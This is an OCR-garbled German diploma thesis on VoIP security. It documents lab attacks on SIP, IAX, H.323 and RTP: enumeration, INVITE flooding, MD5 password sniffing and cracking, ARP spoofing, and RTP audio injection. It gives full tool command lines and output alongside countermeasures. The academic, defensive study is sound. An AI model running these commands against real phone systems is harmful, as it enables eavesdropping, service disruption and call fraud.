Home

Diplombericht

image

Contents

1. 6 4 5 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 151 6 5 1 VLAN Angriff 152 6 6 1 DOS PING Flood 153 6 6 2 Technik und Funktionsweise 154 6 6 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 154 6 6 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 155 6 7 1 IP Spoofing 156 6 7 2 Technik und Funktionsweise 157 6 7 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 157 6 7 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 160 6 8 1 IRDP Spoofing 161 6 8 2 Technik und Funktionsweise 162 6 8 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 162 6 8 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 164 6 9 1 ICMP Redirect 165 6 9 2 Technik und Funktionsweise 166 6 9 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 166 6 9 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 167 6 10 1 DHCP Starvation DHCP Rouge Server 168 6 10 2 Technik und Funktionsweise 169 6 10 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 169 6 10 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 171 6 11 1 DoS SYN Flood 172 6 11 2 Technik und Funktionsweise 173 6 11 3 Au
2. x nemesis mit RTP Paket iSEC RTP Flood DOS Downloadlink Quelle des Tools Schweregrad http www isecpartners com rtp_injection_files html 1 leicht 6 schwer Nemesis ist in BackTrack3 enthalten Hinweise zu Installation Verfiigbarkeit Installation Tool 5 Anwendung Tool 5 Nemesis ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 6 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 iSEC RTP Flood ist ein vordefiniertes IP Paket welches mit Hilfe von Gefahrenpotential nemesis zum Angriffsziel gesendet wird 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Dieser Angriff zielt auf die Verf gbarkeit der Sprachkan le ab Der Angreifer flutet ein Endger t oder den VOIP Server mit RTP Sprachpaketen Ziel ist es das Angriffsziel mit einer sehr grossen Menge RTP Paketen derart zu bombardieren dass dieses nur noch damit besch ftigt ist diese Pakete abzuarbeiten Dabei kann das Angriffsziel den blichen Aufgaben nicht mehr nachkommen Die wirklich anstehenden RTP Pakete der aktuellen Verbindung in der sich das Angriffsziel momentan befindet k nnen nicht mehr fristgerecht abgearbeitet werden Sehr grosse Verz gerungen das Verwerfen von RTP Paketen bis hin zum Verbindungsabbruch sind die Folgen dieser Attacke Schutz gegen Angriff Analyse Switches mit DoS Detektoren verwenden welche
3. Eingesetztes Tool Verf gbarkeit Cain amp Abel und Wireshark Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Installation Tool Anwendung Tool Erforderliche Vorkenntnisse Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel Wert Ziel Angriff Analyse Dieser Angriff zielt auf die Vertraulichkeit ab Dabei h rt der Angreifer das Netzwerk nach RTP Sprachpaketen ab und zeichnet diese auf Diese Pakete lassen sich jeweils einem bestimmten Gespr chskanal zuordnen und k nnen dank der Nummerierung der Pakete wieder in der richtigen Reihenfolge als Audio File wiedergegeben werden Dadurch h rt der Angreifer den gesamten Gespr chsinhalt der kommunizierenden Angriffsziele mit Schutz gegen Angriff Analyse Siehe Massnahmen SRTP Kapitel 8 4 1 Siehe Massnahmen Tunneln mit IPSec Kapitel 8 4 2 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security S Sch r MAS 06 02 20 Seite 115 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 5 2 2 Technik und Funktionsweise Um den Netzwerkverkehr nach RTP Sprachpaketen abzuhorchen werden Netzwerkmonitore eingesetzt Diese zeichnen alle Pakete die bers Netzwerk transportiert werden auf und je nach Implementation lassen sich aus diesen heraus gleich WAV Files der aufgez
4. root Konqueror lt 2 gt Location Edit View Go Bookmarks Tools Settings Window Help eocet 00 2 93 Mam a E gt Location om froot 4 AET wi 3 Das Logfile logfileARPPoisoning pcap kann mittels Wireshark ge ffnet und die RTP Pakete als Audiowiedergabe abgespielt werden Siehe dazu auch Kapitel 5 2 1 Eile Edit iew Go Capture Analyze Statistics Help Filter S Expression Clear Apply No Time Source Destination Protocol Info 389 505 862607 vmware_55 dd b4 Broadcast ARP who has 10 1 1 129 Tell 10 1 1 107 390 505 863401 Aastra_19 93 a7 vmware_55 dd b4 ARP 10 1 1 129 is at 00 08 5d 19 93 a7 Frame 1 60 bytes on wire 60 bytes captured Ethernet II Src Netopia 21 79 14 00 0f cc 21 79 14 Dst Aastra_82 10 e8 00 08 5d 82 10 e8 Internet Protocol Src 212 117 200 148 212 117 200 148 Dst 10 1 1 201 10 1 1 201 0000 00 08 5d 82 10 e8 00 OF cc 21 79 14 08 00 45 00 y E j 6 1 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Durch ARP Spoofing kann der Angreifer eine MitM Man in the Middle Attacke ausf hren Er funktioniert somit als Zwischenstelle wo der gesamte Daten respektive Sprachverkehr seiner Angriffsziele dar ber l uft Einerseits kommt der Angreifer in Kenntnis mit wem und wann seine Angriffsziele kommunizieren und was der Gespr chsinhalt ist Andererseits laufen ber ihn auch s mtliche Registrieru
5. Ziel Angriff Analyse Bei der Enumeration geht es dem Angreifer darum im ganzen Ziel Netzwerk so viele Informationen ber die angeschlossenen User Agents Hard oder Softphones Registrars Proxy Server und Redirect Server zu erhalten wie es berhaupt m glich ist Die Enumeration steht meist am Anfang weiterer Angriffe welche jedoch erst mit den aus der Enumeration gewonnen Kenntnissen m glich sind Schutz gegen Angriff Analyse Eine wirksame Schutzmassnahme ist schwierig zu realisieren denn die Ports m ssen f r die korrekte Funktionalit t offen bleiben Einzige m gliche Massnahmen sind Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen IDS Kapitel 8 5 15 Kommentar Zenmap ist nichts anderes als nmap mit der GUI Erweiterung Diese GUI Erweiterung ist je nach Installationspaket von nmap automatisch darin enthalten Dieser Angriff l sst sich sowohl mit zenmap wie auch mit nmap ausf hren Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 32 2 2 2 Technik und Funktionsweise Berner Fachhochschule Technik und Informatik Software Schule Schweiz F r die Enumeration werden Portscanner eingesetzt Mit dem Wissen dass die SIP Terminals Registrars und SIP Proxy Server normalerweise auf dem Port 5060 das spezifisch nach offenen 5060 Ports gesucht werden Netzwerk nach eingehenden Nachrichten abh ren kann Der Einsatz dieses Tools wird dem Angreif
6. Schutz gegen Angriff Analyse Es m ssen zwingend sichere Passw rter verwendet werden Sichere Passw rter sind keine W rter die in einem Dictionary oder Duden vorkommen auch wenn diese zum Beispiel am Schluss noch mit zwei Zahlen versehen werden z Bsp Spanien08 UNSICHER Sichere Passw rter enthalten Sonderzeichen Gross und Kleinschreibung ergeben keinen Sinn und sind mindestens 8 Zeichen lang Sichere Passw rter stehen auch nicht auf einen Post it Notizzettel unter dem Telefonieterminal oder der PC Tastatur Siehe Massnahmen Substandards H 235 1 bis H 235 5 Kapitel 8 3 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Nachtr gliche Bemerkungen Abkl rungen mit einem Buchautor VOIP Hacking haben ergeben dass f r die offline Dictionary Attacke IAX Brute eingesetzt werden kann Infolge der sp ten Antwort dieses Buchautors konnte leider diese offline Dictionary Attacke gegen das MD5 gehashte H 323 Passwort nicht mehr ausgef hrt werden Der Angriff wird zwecks Vollst ndigkeit trotzdem aufgef hrt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 108 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 4 32 Technik und Funktionsweise Die mit H 323 am meisten eingesetzte Authentifizierungs Methode ist das MD5 Password Hashing Dazu wird der Benutzername das Passwort und der Zeitstempel ASN 1 encoded und daraus einen MD5 Hashwert ge
7. Was die Kommandos und Argumente im Einzelnen bedeuten wurde zuvor schon bei obigem Angriff erkl rt Der Angriff verh lt sich anders als zuvor beim Test des User Agents 4129 Protos Test Suite l uft vollst ndig durch und somit kommt auch immer eine Response Antwort von der Applikation X Lite zur ck KKK bt protos voip java jar c07 sip r2 jar touri 4119 10 1 1 101 fromuri 4999 10 1 1 101 teardown sendto 10 1 1 151 delay 1000 dport 18372 validcase start 1 single valued java class path using it s value for jar file name reading data from jar file c07 sip r2 jar Sending valid case test case 0 445 bytes Received Returncode 486 Sending CANCEL test case 0 224 bytes Received Returncode 481 Sending ACK test case 0 218 bytes Sending Test Case 1 test case 1 444 bytes Received Returncode 400 Sending valid case test case 4526 451 bytes Received Returncode 486 Sending CANCEL test case 4526 230 bytes Received Returncode 481 Sending ACK test case 4526 224 bytes Received Returncode 486 okk Auf den ersten Blick scheint X Lite resistent gegen diesen Angriff zu sein Jedoch wenn der PC des Angriffziels betrachtet wird auf welchem X Lite gestartet war zeigt sich ein anders Bild Obwohl nach jeder durch Protos gesendeten INVITE Nachricht eine CANCEL Nachricht gesendet wurde welche die INVITE Nachricht h tte abbauen sollen stehen ankommende Anrufe an es klingelt und es ist keine freie Linie mehr
8. Real Time Transport Protocol oee Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet rtpmixsound lachensox wav a 10 1 1 101 A 14354 b 10 1 1 241 B 50076 i eth0 v Die Werte im Einzelnen stehen wie folgt f r rtpmixsound Aufruf des Angriff Tools Lachensox wav Audioquelle welche in das Gespr ch eingef gt werden soll a 10 1 1 101 Quell IP Adresse der RTP Sprachpakete gespoofte Absenderadresse A 14354 Quell Port gespooftes Absenderport ersnifft siehe Bild oben b 10 1 1 241 Empf nger IP Adresse der RTP Sprachpakete Angriffsziel B 5076 Empf nger Port Port Angriffsziel ersnifft siehe Bild oben i ethO Besagt ber welche Schnittestelle des PC s die Daten gesendet werden sollen v Voransicht Tool erzeugt mehr Logs Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 122 oh ok bt rtpmixsound lachensox wav a 10 1 1 101 A 14354 b 10 1 1 241 B 50076 i ethO v rtpmixsound Version 3 0 JanUser Agentry 03 2007 source IPv4 addr port 10 1 1 101 14354 dest IPv4 addr port 10 1 1 241 50076 Input audio file lachensox wav spoof factor 2 jitter factor output spoofed packets ASAP Verbose mode Audio file format RIFF 0x52 0x49 0x46 0x46 Total Audio File Size 26219 Pre recorded audio content format WAVE 0x57 0x41 0x56 0x45 Next chunk header type fmt 0x66 Ox6d 0x74 0x20 Compression Code 1 Channels 1 Sample Rate
9. 4 Das Tool ist nur unter Windows lauff hig die Installation ist Erforderliche Vorkenntnisse 4 men gef hrt Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Die meisten Netzwerke werden heute mittels Switches aufgebaut In einem geswitchten Netzwerk werden die Daten jeweils nur an dasjenige Switchport gesendet an welchem sich auch der f r die Daten bestimmte PC befindet Mittels MAC Flooding gelingt es einem Angreifer dass der Switch die Daten an alle Ports sendet Somit kann auf den anderen Ports mitgehorcht werden was die an diesem Switch angeschlossen Rechner bers Netzwerk senden oder empfangen Dies k nnen zum Beispiel Registrierungsdaten wie Benutzernamen und Passw rter geheime Finanzzahlen oder Sprachpakete aktueller VOIP Gespr che sein Schutz gegen Angriff Analyse Switche mit DoS Detektoren verwenden welche solche Angriffe unterbinden Siehe Massnahmen IDS Kapitel 8 5 15 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 143 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 3 2 Technik und Funktionsweise Switche f hren intern eine MAC Tabelle Darin wird dynamisch festgehalten an welchem Port zur Zeit welcher PC angeschlossen ist Die Identifikation des PC s wird jeweils ber dessen MAC Adresse bewerkst
10. BS Panasonic Communications Co 121 cE SF Aastra 129 cE AV Aastra 151 So Intel Corporate S Sch r MAS 06 02 20 Seite 33 eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz Durch Klicken auf einen bestimmten Host werden mehr Detailinformationen wie zum Beispiel MAC Adresse Device Type Operating System und Network Distance preisgegeben Mit der MAC Adresse ist auch der Hersteller dieses Devices aufgelistet Solche Informationen liefern f r sp tere Angriffe sehr n tzliche Hinweise we u ae Scan Tools Profile Help 4 Target Profile Command nmap sU p 5060 10 1 1 0 24 Hosts Services Nmap Output Ports Hosts Topology Host Details Scans nmap PE v PA21 23 80 3389 sU A T4 10 1 1 129 OS y Host v w 10111 r a j FAR P Starting Nmap 4 76 http nmap org at 2008 12 23 13 40 Mitteleurop ische Zeit 1011101 Initiating ARP Ping Scan at 13 40 1011102 Scanning 10 1 1 129 1 port Completed ARP Ping Scan at 13 40 0 243 elapsed 1 total hosts E 1011103 Initiating Parallel DNS resolution of 1 host at 13 40 111121 ompleted Parallel DNS resolution of 1 host at 13 40 0 01s elapsed Initiating UDP Scan at 13 40 1011129 Scanning 10 1 1 129 1000 ports w 1011151 Completed UDP Scan at 13 41 5 92s elapsed 1000 total ports Initiating Service scan at 13 41 1011241 Scanning 41 services on 10 1 1 129 Completed Service scan at 13 4
11. Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 2 12 2 Technik und Funktionsweise Der Angreifer sendet beim Flooding eine sehr grosse Menge INVITE Nachrichten an das Angriffsziel Dieses muss die empfangenen Nachrichten abarbeiten und kann dadurch die sonst anstehenden Aufgaben wie Vermittlung der RTP Pakete oder Verbindungsanfragen anderer User Agent nicht fristgerecht abarbeiten 2 12 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Bei nachfolgendem Angriff soll der User Agent 4129 mit der IP Adresse 10 1 1 129 mittels inviteflood angegriffen werden Das Terminal des User Agent 4129 Aastra 57i befindet sich in Ruhestellung ist also nicht in einer aktuellen Gespr chsverbindung Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet inviteflood ethO 4129 10 1 1 101 10 1 1 129 1000000 Die Argumente im Einzelnen stehen wie folgt f r inviteflood gt gt spricht das Tool an startet es und bergibt nachfolgende Argumente ethO gt gt definiert die Schnittstelle ber welche die Nachricht gesendet werden soll 4129 gt gt Nummer des User Agents an welchen die INVITE Nachrichten gesendet werden sollen 10 1 1 101 gt gt IP Adresse Domain SIP Proxy Server an welchem das Angriffsziel angeschlossen ist 10 1 1 129 gt gt IP Adresse des Angriffszieles 1000000 gt gt Anzahl INVITE Meldungen die zum Angriffsziel gesendet werden sollen KKK
12. Die aktuelle und zu Zeit eingesetzte Version ist AX2 Die ganze Architektur und Implementierung des IAX Protokolls ist bewusst sehr simpel gehalten Dies bietet gegen ber den anderen bekannten Signalisierungsprotokollen wie SIP oder H 323 klare Vorteile Durch den kleinen Protokoll Overhead kann IAX auch bei kleinen Bandbreiten wie G 729 oder GSM eingesetzt werden Mit einer Sende Datenrate von ca 38kBit s sind sogar Verbindungen ber analoge Modems m glich Es wird nur ein einziger Port f r die bertragung des Audiostreams und der Signalisierung ben tigt somit fallen auch die bekannten NAT oder Firewallprobleme weg wie sie zum Beispiel bei SIP oder H 323 vorkommen Der Endpoint braucht lediglich den Port UDP 4569 offen zu halten IAX2 wurde infolge fehlender Sicherheitsmechanismen entwickelt Mit IAX2 wurde die M glichkeit geschaffen per Challenge Response Verfahren die Gegenstellen zu authentifizieren dies kann durch einen MD5 Hashwert oder eine RSA Verschl sselung sein Auch steht eine AES 128 Bit Datenverschl sselung zur Verf gung Somit bietet IAX2 die M glichkeit die Datenintegrit t sowie die Vertraulichkeit gew hrleisten zu k nnen Oftmals werden jedoch aus Unwissenheit oder Bequemlichkeit genau diese Sicherheitskomponenten nicht angewendet und Passw rter resp Benutzernamen in Klartext ber das Netzwerk bertragen Einem Angreifer bietet sich die M glichkeit einen Endpoint mit sehr vielen IAX2 Nachrichten zu fluten un
13. IAX Brute exe ist unter Windows lauff hig und wird via Commandline Erforderliche Vorkenntnisse 5 aufgerufen Siehe Beispiel unten Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Asterisk Proxy Server erlauben folgende drei verschiedene Authentifizierungen der IAX Clients Klartext MD5 oder RSA RSA wird infolge des hohen Handling Aufwandes des Schl sslepaares public und private key sehr selten eingesetzt obwohl sie die sicherste w re Die MD5 Authentifizierung bietet auch nur dann einen wirksamen Schutz wenn sichere Passw rter verwendet werden Bei der Klartext Authentifizierung werden sowohl Benutzername als auch Passwort in Klartext ber das Netzwerk gesendet Ziel des Angreifers ist es an Passw rter und die dazugeh rigen Benutzerkonten zu kommen Einmal im Besitz dieser Angaben kann der Angreifer ein eigenes Telefon mit den falschen Benutzerkonten an das Netzwerk anschliessen Dadurch wird die Registrierung des zuvor im Netzwerk vorhandenen originalen IAX Clients gel scht Alle ankommenden Anrufe klingeln beim Angreifer Auch kann der Angreifer abgehende Gespr che mit falscher Identit t f hren Somit k nnen auch Gespr che auf Kosten anderer gef hrt werden Schutz gegen Angriff Analyse Es m ssen zwingend sichere Passw rter verwendet werden Sichere Passw rter sind keine W rter die in einem Dictionary oder Duden vork
14. Nachricht welche vom Asterisk Proxy Server an das Angriffsziel gesendet wurde Es ist zu sehen dass die Source MAC Adresse zur derjenigen in der oben gespooften Nachricht abweicht gesinfft Verbindungsaufbau 251 sendet File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 15034 73 752252 10 1 1 101 10 1 1 241 UDP Source port 14354 Destination port 50076 Frame 15034 214 bytes on wire 214 bytes captured S Ethernet II Src Dell_f0 22 43 00 14 22 f0 22 43 Dst CompalIn_Ob ad 96 00 1e ec 0b ad 96 amp Destination CompalIn_Ob ad 96 00 1e ec 0b ad 96 Address CompalIn_Ob ad 96 00 1e ec 0b ad 96 5 3 1 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Die beiden Gespr chspartner werden verwirrt sein h ren Ger usche von der Gegenseite die sie eigentlich nicht h ren sollten Sie f hlen sich vom anderen Gespr chspartner belogen oder ahnen dass jemand mitlauscht Dies kann zu ganz schwierigen sowohl gesch ftlichen wie auch pers nlichen Auseinandersetzungen f hren Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 124 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 5 4 1 RTP Flooding Integritat RESTE RE Vertraulichkeit Eingesetztes Tool Verf gbarkeit
15. pase so 1 ver Done Scanning Save Results under File Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 36 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz Nach erfolgtem Scann Vorgang werden die Ergebnisse angezeigt und k nnen auch als File abgespeichert werden Das Resultat f r obigen Scann Vorgang sieht wie folgt aus ok ok SIPSCAN Results Scan started Mon Dec 22 21 01 34 2008 Target SIP Server 10 1 1 101 5060 UDP Domain 10 1 1 101 1 gt gt Found a live extension user at 4002 10 1 1 101 with SIP response code s REGISTER 200 2 gt gt Found a live extension user at 4003 10 1 1 101 with SIP response code s REGISTER 200 3 gt gt Found a live extension user at 4111 10 1 1 101 with SIP response code s REGISTER 200 4 gt gt Found a live extension user at 4115 10 1 1 101 with SIP response code s REGISTER 200 5 gt gt Found a live extension user at 4119 10 1 1 101 with SIP response code s REGISTER 401 6 gt gt Found a live extension user at 4129 10 1 1 101 with SIP response code s REGISTER 200 RK Aus den SIPSCAN Resultaten ist folgendes zu entnehmen Es gibt f r folgende User Agents g ltige Konten beim Registrar 4002 4003 4111 4115 4119 und 4129 Die Registrierung f r die User Agents 4002 4003 4111 4115 und 4120 wurde mit einer Response Nachricht REGISTER 200 beantwortet was so viel wie OK heisst Dies sagt aus dass einerseits die im
16. SIP gt GRE PPP 0 lt gt PPPoE 0 m il A E Hosts APR Routing Fh Passwords Mittels rechter Maustaste gt gt Send to Cracker wird dieser Eintrag in den Tab Cracker von Cain amp Abel kopiert Danach wird in den Tab Cracker gewechselt B File View Configure Tools Help ETTITT o u 090mmEs08n OF it HTTP 1043 B mar 0 Send Allto Cracker EA LDAP 0 iD POP3 0 EEE La s SMB 0 Remove All mee m Mittels rechter Maustaste gt gt Dictionary Attack wird der Angriff der W rterbuch Attacke Dictionary Attack eingeleitet B File View Configure Tools Help awohhn o 8 an ummusoen OF i Cracker decodes E newer E Sue cocker O Taero WN CSU Wises ED Quer Resin Dr Nonce Resp nated A LM amp NTLM Hast BR NTLMv2 Hashes Dictionary Attack BR MS Cache Hashe Brute Force Attack amp PWL files 0 WH Cisco 10S MDS H Salat AN AB Cisco PIX MDS Hi Note QP APOP MDS Hashi CRAM MOS Hash a anie p OSPF MDS Hashe f gt RIPV2 MD5 Hashe Ri 5 gt VRRP HMAC Has BERN Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 46 Berner Fachhochschule Technik und Informatik Software Schule Schweiz Im Fenster Dictionary Attack k nnen durch Rechtsklicken mit der Maustaste ins weisse File Feld W rterlisten Wor
17. SIP wird sich am Markt immer mehr durchsetzen und ltere bestehende Protokolle wie H 323 verdr ngen Eine Standardimplementierung von SIP ohne zus tzliche Schutzmassnahmen bietet bez glich Integrit t und Verf gbarkeit keinen wirklichen Schutz Mittels gezielten Angriffen wie DoS oder Flooding kann ein ungesch tztes VOIP System innert k rzester Zeit komprimitiert werden In den letzten Jahren sind jedoch vermehrt im Bereich kryptographischer Protokolle Entwicklungen und Neuimplementierungen zu beobachten gewesen Dies deutet darauf hin dass ein Umdenken und Handeln betreffend der VOIP Sicherheit bereits statt gefunden hat und innert k rzester Zeit neue Sicherheitsmerkmale auf Ebene der Protokolle und Signalisierung verf gbar sein werden 11 Fazit Mit dem Einsatz der heute schon verf gbaren Sicherheitsmerkmale ist VOIP eine ernstzunehmende Alternative zur herk mmlichen Analog oder Digital Telefonie Mit der weiteren Entwicklung der Sicherheitsmerkmale werden diese Systeme die bisherigen Technologien abl sen und den Telefonie Markt beherrschen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 197 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 12 Quellen Angaben Internet Links http www voipsa org http www hackingvoip com http de wikipedia org http www isecpartners com http remote exploit org backtrack_download html https downloads bsi fuer buerger de lit
18. bt inviteflood eth0 4129 10 1 1 101 10 1 1 129 1000000 inviteflood Version 2 0 June 09 2006 source IPv4 addr port 10 1 1 107 9 dest IPv4 addr port 10 1 1 129 5060 targeted User Agent 4129 10 1 1 101 Flooding destination with 1000000 packets sent 1000000 bt KKK Der Angriff erzielte folgende Wirkung Verhalten des Ger tes w hrend Flooding Weder ankommende noch abgehende Gespr che sind m glich das Ger t bleib stumm Verhalten des Ger tes nach dem Flooding Ger t beginnt auf allen Leitungstasten zu klingeln diese Rufe m ssen einzeln abgebaut werden Danach ist das Ger t wieder betriebsbereit Untenstehender Wireshark Trace zeigt das Flooding des User Agents 4129 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 73 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Der User Agent 4119 mit dem Soft Phone X Lite wurde ebenfalls geflutet Da es sich um ein Softphone handelt musste hierzu in der Befehlszeile speziell das Port auf welchem das Softphone das Netzwerk nach SIP Nachrichten abhorcht mittels dem String D 14452 eingegeben werden ok ok bt inviteflood eth0 4119 10 1 1 101 10 1 1 151 1000000 D 14452 inviteflood Version 2 0 June 09 2006 source IPv4 addr port 10 1 1 107 9 dest IPv4 addr port 10 1 1 151 5060 targeted User Agent 4119 10 1 1 101 Flooding destination with 1000000 packets sent 1000000 bt KKK
19. 8 5 18 Zugangs und Zugriffsschutz Netzwerkkomponenten und Netzwerkanschl sse sind vor unberechtigtem Zutritt physikalisch zu sch tzen Eine Netzwerkauthentisierung wie Port Security NAC oder 802 1x sch tzt vor logischem unberechtigtem Zugang Remote Zug nge sind entsprechend zu sch tzen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 194 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 9 Zusammenfassung Pers nliche Schlussbemerkungen Diese Diplomarbeit besch ftigte sich mit den Gefahren und Sicherheitsm ngel der VOIP Telefonie Prim r war das Ziel dieser Arbeit aufzuzeigen ob und wie leicht mit welchen Tools welche im Internet frei verf gbar sind Angriffe gegen VOIP Systeme vollzogen werden k nnen Es war nicht das Ziel eine Zusammenfassung schon bestehender Dokumente ber VOIP Security zu machen welche zu Gen ge im Internet auffindbar sind Dadurch war der praktische Teil der das Ausf hren der Angriffe gegen die VOIP Systeme und Protokolle beinhaltete der zeitintensivste Es wurden zuerst die gem ss Pflichtenheft zu testenden und definierten VOIP Protokolle SIP H 323 SDP IAX RTP RTCP und MGCP Megaco gr ndlich analysiert und bewertet Dabei konnten die Protokolle in lohnenswerte und nicht lohnenswerte Angriffs Ziele unterteilt werden Massgebend f r diese Klassifizierung war ihre Anwendung und Verbreitung was sich auch in der Verf gbarkeit existi
20. Byte 0 Byte 1 Byte2 Byte 3 Bit 011 23 4 5 6 7 Bit 01112345 6 7 Bit 011 2 3 456 7 Bit 01 23 14 56 7 V 2 P X CC M PT sequence number timestamp in sample rate units synchronization source SSRC identifier contributing source CSRC identifiers optional Header Extension optional Quelle Bild http de wikipedia org wiki Real Time_Transport_Protocol V Version des RTP Protokolls 2 Bit P Padding gesetzt wenn ein oder mehrere F ll Oktets an Ende des Paketes angeh ngt sind X Extension gesetzt wenn Header um ein Erweiterungsheader erg nzt wird CC CSRC Z hler gibt Anzahl CSRC Identifier an M Marker reserviert f r anwendungsspezifische Verwendung PT Payload Type Format des zu transportierenden RTP Inhaltes Sequence N Inkrementiert mit jedem Paket Empf nger kann Reihenfolge der Pakete wieder herstellen Timestamp Wird zur Synchronisation verwendet 32 Bit SSRC Identifikationsnummer der Synchronisationsquelle 32 CSRC Liste Liste der Identifikationsquellen welche im RTP Payload enthalten sind Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 113 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 5 1 2 RTOP Real time ControlTransport Protocol Einf hrung Im gleichen RFC wie RTP wurde auch RTCP definiert RTCP wird fiir die Einhaltung und Aushandlung von QOS Quality of Service eingesetzt Dabei werden zwischen Source und Destination periodisch Steuernachricht
21. Cain amp Abel snifft das Netzwerk nach MD5 Hashwerten ab die dar ber gesendet werden und speichert diese inklusive der restlichen ben tigten Daten welche in Klartext bertragen wurden Nach ersnifften MD5 Hashwerten kann via Cain amp Abel eine offline Dictionary Attacke gestartet werden 2 5 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer h rt das Netzwerk nach bertragenen MDS ab In diesem Beispiel registriert sich gerade User Agent 4119 am Asterisk Proxy Server 10 1 1 101 Damit der Angreifer die im Netzwerk ausgetauschten MD5 Hashwerte sniffen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Nach dem Starten von Cain amp Abel wird der Sniffer mittels zweitem Icon von links gestartet Der Tab Sniffer wird gew hlt und in diesem wiederum den Tab Passwords am unteren Bildschirmrand Cain amp Abel snifft jetzt dauernd das Netzwerk ab sortiert die empfangenen Daten und kategorisiert sie nach den entsprechenden Diensten i el E cee File View Configure Tools Help alp Och m o 2 Ommegang A Decoders Network Sniffer Cracker Traceroute M CCDU C Wireless Fo Que ED ry Fy Passwords A p FTP 0 amp HTTP 1140 G IMAP 0 EA LDAP 0 P PoP3 0 s SMB 0 B Telnet 0 rd VNC 0 fy TDs 0 Es TNS 0 WE SMTP 0 NNTP 0 DCE RPC 0 63 MSKerb5 PreAutt SA Radius Keys 0 Radius Users 0 amp 1CQ 0
22. Hz 8000 Avg Bytes sec 8000 Block Align 1 Significant Bits sample 8 Next chunk header type data 0x64 0x61 0x74 0x61 chunk data size 26175 Audio read from input file eqUser Agenttes to 163 G711 packets At an ideal playback rate of 50 Hz this represents 3 26 seconds of audio Ready to inject press lt ENTER gt to begin injection eth0 s MAC 00 0c 29 42 86 fe e eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz pcap filter installed for live audio stream sniffing src host 10 1 1 101 and dst host 10 1 1 241 and udp sre port 14354 and udp dst port 50076 and not ether sre 00 0c 29 42 86 fe pcap live eth0 interface is blocking Attempting to sniff RTP packets from the specified audio stream Successfully detected a packet from targeted audio stream source MAC 00 14 22 f0 22 43 destination MAC 00 le ec 0b ad 96 source IP 10 1 1 101 destination IP 10 1 1 65521 source port 14354 destination port 50076 UDP packet length 180 RTP message length 172 Size of RTP Header 12 RTP Version 2 RTP Packet Padded no RTP Packet Fixed Hdr Followed by Extension Hdr no RTP Packet CSRC Count 0 RTP Packet Marked no RTP Packet Payload Type 0 RTP Packet Sequence 21243 RTP Packet Timestamp 3099360 RTP Packet SSRC 1408885980 __RTPMIXSOUND_LIBNET_PROTOCOL_LAYER 3 Will inject spoofed audio at IP layer Will now synchronize the mixing interlacing of the pre
